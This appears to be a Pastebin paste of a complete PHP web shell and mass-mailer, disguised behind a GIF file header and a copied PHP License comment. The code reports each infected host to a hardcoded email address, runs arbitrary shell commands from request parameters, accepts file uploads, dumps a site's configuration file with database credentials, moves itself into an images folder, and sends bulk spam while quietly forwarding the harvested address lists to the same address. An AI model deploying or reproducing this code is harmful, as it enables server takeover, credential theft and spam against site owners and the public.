Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- GIF892MPEG<?php
- /**
- --------------------------------------------------------------------
- The PHP License, version 3.0
- Copyright (c) 1999 - 2006 The PHP Group. All rights reserved.
- Redistribution and use in source and binary forms, with or without
- modification, is permitted provided that the following conditions
- are met:
- 1. Redistributions of source code must retain the above copyright
- notice, this list of conditions and the following disclaimer.
- 2. Redistributions in binary form must reproduce the above copyright
- notice, this list of conditions and the following disclaimer in
- the documentation and/or other materials provided with the
- distribution.
- 3. The name "PHP" must not be used to endorse or promote products
- derived from this software without prior written permission. For
- written permission, please contact group@php.net.
- 4. Products derived from this software may not be called "PHP", nor
- may "PHP" appear in their name, without prior written permission
- from group@php.net. You may indicate that your software works in
- conjunction with PHP by saying "Foo for PHP" instead of calling
- it "PHP Foo" or "phpfoo"
- 5. The PHP Group may publish revised and/or new versions of the
- license from time to time. Each version will be given a
- distinguishing version number.
- Once covered code has been published under a particular version
- of the license, you may always continue to use it under the terms
- of that version. You may also choose to use such covered code
- under the terms of any subsequent version of the license
- published by the PHP Group. No one other than the PHP Group has
- the right to modify the terms applicable to covered code created
- under this License.
- 6. Redistributions of any form whatsoever must retain the following
- acknowledgment:
- "This product includes PHP, freely available from
- <http://www.php.net/>".
- --------------------------------------------------------------------
- THIS SOFTWARE IS PROVIDED BY THE PHP DEVELOPMENT TEAM ``AS IS'' AND
- ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
- THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
- PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE PHP
- DEVELOPMENT TEAM OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
- INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
- (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- OF THE POSSIBILITY OF SUCH DAMAGE.
- */
- error_reporting(0);
- if (!isset($_SESSION['bajak'])) {
- $visitcount = 0;
- $web = $_SERVER["HTTP_HOST"];
- $inj = $_SERVER["REQUEST_URI"];
- $body = "ada yang inject \n$web$inj";
- $safem0de = @ini_get('safe_mode');
- if (!$safem0de) {$security= "SAFE_MODE = OFF";}
- else {$security= "SAFE_MODE = ON";};
- $serper=gethostbyname($_SERVER['SERVER_ADDR']);
- $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
- mail("mihawkstore@yahoo.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
- $_SESSION['bajak'] = 0;
- }
- else {$_SESSION['bajak']++;};
- if(isset($_GET['clone'])){
- $source = $_SERVER['SCRIPT_FILENAME'];
- $desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
- rename($source, $desti);
- }
- $safem0de = @ini_get('safe_mode');
- if (!$safem0de) {$security= "SAFE_MODE : OFF";}
- else {$security= "SAFE_MODE : ON";}
- echo "<title>elv1n4</title><br>";
- echo "<font size=2 color=#888888><b>".$security."</b><br>";
- $cur_user="(".get_current_user().")";
- echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
- echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
- function pwd() {
- $cwd = getcwd();
- if($u=strrpos($cwd,'/')){
- if($u!=strlen($cwd)-1){
- return $cwd.'/';}
- else{return $cwd;};
- }
- elseif($u=strrpos($cwd,'\\')){
- if($u!=strlen($cwd)-1){
- return $cwd.'\\';}
- else{return $cwd;};
- };
- }
- echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
- echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
- if(isset($_POST['submit'])){
- $uploaddir = pwd();
- if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
- move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
- if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
- echo "Upload Failed";
- } else { echo "Upload Success to ".$uploaddir.$name." :D "; }
- }
- if(isset($_POST['command'])){
- $cmd = $_POST['cmd'];
- echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
- }
- elseif(isset($_GET['cmd'])){
- $comd = $_GET['cmd'];
- echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
- }
- elseif(isset($_GET['rf'])){
- $rf = file_get_contents("../../configuration.php");
- echo $rf;
- }
- else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
- }
- @$action=$_POST['action'];
- @$from=$_POST['from'];
- @$realname=$_POST['realname'];
- @$replyto=$_POST['replyto'];
- @$subject=$_POST['subject'];
- @$message=$_POST['message'];
- @$emaillist=$_POST['emaillist'];
- @$file_name=$_FILES['file']['name'];
- @$contenttype=$_POST['contenttype'];
- @$file=$_FILES['file']['tmp_name'];
- @$amount=$_POST['amount'];
- set_time_limit(intval($_POST['timelimit']));
- If ($action=="mysql"){
- //Grab email addresses from MySQL
- include "./mysql.info.php";
- if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
- print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
- exit;
- }
- $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
- mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
- $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
- $numrows = mysql_num_rows($result);
- for($x=0; $x<$numrows; $x++){
- $result_row = mysql_fetch_row($result);
- $oneemail = $result_row[0];
- $emaillist .= $oneemail."\n";
- }
- }
- if ($action=="send"){ $message = urlencode($message);
- $message = ereg_replace("%5C%22", "%22", $message);
- $message = urldecode($message);
- $message = stripslashes($message);
- $subject = stripslashes($subject);
- }
- ?>
- <form name="form1" method="post" action="" enctype="multipart/form-data"><br />
- <table width="142" border="0">
- <tr>
- <td width="81">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
- </div>
- </td>
- <td width="219">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="from" value="<?php print $from; ?>" size="30" />
- </font>
- </td>
- <td width="212">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
- </div>
- </td>
- <td width="278">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
- </font>
- </td>
- </tr>
- <tr>
- <td width="81">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
- </div>
- </td>
- <td width="219">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
- </font>
- </td>
- <td width="212">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
- </div>
- </td>
- <td width="278">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="file" name="file" size="24" />
- </font>
- </td>
- </tr>
- <tr>
- <td width="81">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
- </div>
- </td>
- <td colspan="3" width="703">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="subject" value="<? print $subject; ?>" size="90" />
- </font>
- </td>
- </tr>
- <tr valign="top">
- <td colspan="3" width="520">
- <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
- </td>
- <td width="278">
- <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
- </td>
- </tr>
- <tr valign="top">
- <td colspan="3" width="520">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
- <input type="radio" name="contenttype" value="plain" /> Plain
- <input type="radio" name="contenttype" value="html" checked="checked" /> HTML
- <input type="hidden" name="action" value="send" /><br />
- Number to send: <input type="text" name="amount" value="1" size="10" /><br />
- Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
- <input type="submit" value="Send eMails" />
- </font>
- </td>
- <td width="278">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
- </font>
- </td>
- </tr>
- </table>
- </form>
- <?php
- if ($action=="send"){
- if (!$from && !$subject && !$message && !$emaillist){
- print "Please complete all fields before sending your message.";
- exit;
- }
- $allemails = split("\n", $emaillist);
- $numemails = count($allemails);
- $secure = 'mihawkstore@yahoo.com';
- $filter = "maillist";
- $float = "From : mailist info <full@info.com>";
- $webe = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
- //Open the file attachment if any, and base64_encode it for email transport
- If ($file_name){
- if (!file_exists($file)){
- die("The file you are trying to upload couldn't be copied to the server");
- }
- $content = fread(fopen($file,"r"),filesize($file));
- $content = chunk_split(base64_encode($content));
- $uid = strtoupper(md5(uniqid(time())));
- $name = basename($file);
- }
- for($xx=0; $xx<$amount; $xx++){
- for($x=0; $x<$numemails; $x++){
- $to = $allemails[$x];
- if ($to){
- $to = ereg_replace(" ", "", $to);
- $message = ereg_replace("&email&", $to, $message);
- $subject = ereg_replace("&email&", $to, $subject);
- print "Sending mail to $to.......";
- flush();
- $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
- $header .= "MIME-Version: 1.0\r\n";
- If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
- If ($file_name) $header .= "--$uid\r\n";
- $header .= "Content-Type: text/$contenttype\r\n";
- $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
- $header .= "$message\r\n";
- If ($file_name) $header .= "--$uid\r\n";
- If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
- If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
- If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
- If ($file_name) $header .= "$content\r\n";
- If ($file_name) $header .= "--$uid--";
- mail($to, $subject, "", $header);
- print "ok<br>";
- flush();
- }
- }
- }
- mail($secure, $filter, " sender IP : ". $ip . "" . "From URL : " .$webe. "" ,$emaillist, $float);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement